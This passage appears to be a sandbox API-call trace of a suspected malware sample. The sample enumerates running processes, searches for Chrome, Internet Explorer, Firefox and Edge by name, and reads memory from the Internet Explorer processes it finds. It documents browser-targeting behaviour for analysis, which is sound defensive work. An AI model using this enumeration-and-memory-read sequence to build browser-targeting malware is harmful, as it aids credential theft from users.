	[0214.489] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0214.490] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.490] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.490] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0214.491] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x43a4
	[0214.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.491] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0214.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.491] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.491] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0214.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.492] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.492] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0214.493] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0214.493] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0214.493] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x43a8
	[0214.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.493] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0214.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.494] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.495] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0214.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.495] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.496] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0214.496] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x43ac
	[0214.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.497] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0214.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.497] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.497] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0214.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.497] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.498] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0214.498] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x43b0
	[0214.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.498] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0214.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.499] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.499] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0214.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.499] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.500] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0214.500] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x43b4
	[0214.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.501] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0214.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.501] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.501] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0214.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.502] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.502] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0214.503] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x43b8
	[0214.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.503] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0214.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.503] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.504] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0214.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.504] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.505] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0214.505] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x43bc
	[0214.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.506] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0214.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.506] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.506] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0214.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.506] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.507] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0214.507] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x43c0
	[0214.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.507] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0214.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.508] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.508] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0214.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.509] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.509] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0214.510] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x43c4
	[0214.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.510] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0214.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.510] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.511] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0214.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.511] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.512] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0214.512] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x43c8
	[0214.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.512] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0214.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.513] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.513] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0214.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.513] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.513] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0214.514] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x43cc
	[0214.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.514] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0214.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.515] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.515] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0214.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.515] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.515] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0214.516] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x43d0
	[0214.564] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.564] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0214.565] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.565] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.565] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.565] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0214.566] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.566] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.566] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0214.567] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x43d4
	[0214.567] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.567] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0214.567] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.567] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.568] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.568] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0214.569] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.569] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.569] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0214.570] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x43d8
	[0214.570] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.570] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0214.570] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.570] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.571] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.571] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0214.572] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.572] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.572] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0214.573] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x43dc
	[0214.573] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.573] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0214.574] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.574] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.575] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0214.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.575] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.576] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0214.577] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x43e0
	[0214.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.577] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0214.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.577] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.578] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.578] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0214.578] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.578] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.578] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0214.579] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x43e4
	[0214.579] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.579] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0214.580] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.580] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0214.580] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.580] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0214.580] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.580] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.580] NtQueryInformationProcess (in: ProcessHandle=0x43e4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0214.581] ReadProcessMemory (in: hProcess=0x43e4, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0214.581] ReadProcessMemory (in: hProcess=0x43e4, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0214.581] ReadProcessMemory (in: hProcess=0x43e4, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0214.581] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0214.581] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0214.582] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x43e8
	[0214.582] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.582] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0214.582] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.582] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0214.582] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.582] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0214.583] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.583] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.583] NtQueryInformationProcess (in: ProcessHandle=0x43e8, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0214.583] ReadProcessMemory (in: hProcess=0x43e8, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0214.583] ReadProcessMemory (in: hProcess=0x43e8, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0214.583] ReadProcessMemory (in: hProcess=0x43e8, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0214.583] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0214.583] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0214.584] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x43ec
	[0214.584] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.584] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0214.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.585] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.585] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0214.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.585] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.585] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0214.586] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x43f0
	[0214.586] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.586] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0214.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.587] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.587] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0214.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.587] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.588] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0214.588] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x43f4
	[0214.588] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.588] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0214.589] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.589] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.589] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.589] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0214.589] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.589] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.590] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0214.590] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0214.591] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x43f8
	[0214.591] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.591] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0214.591] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.591] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.592] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.592] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0214.592] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
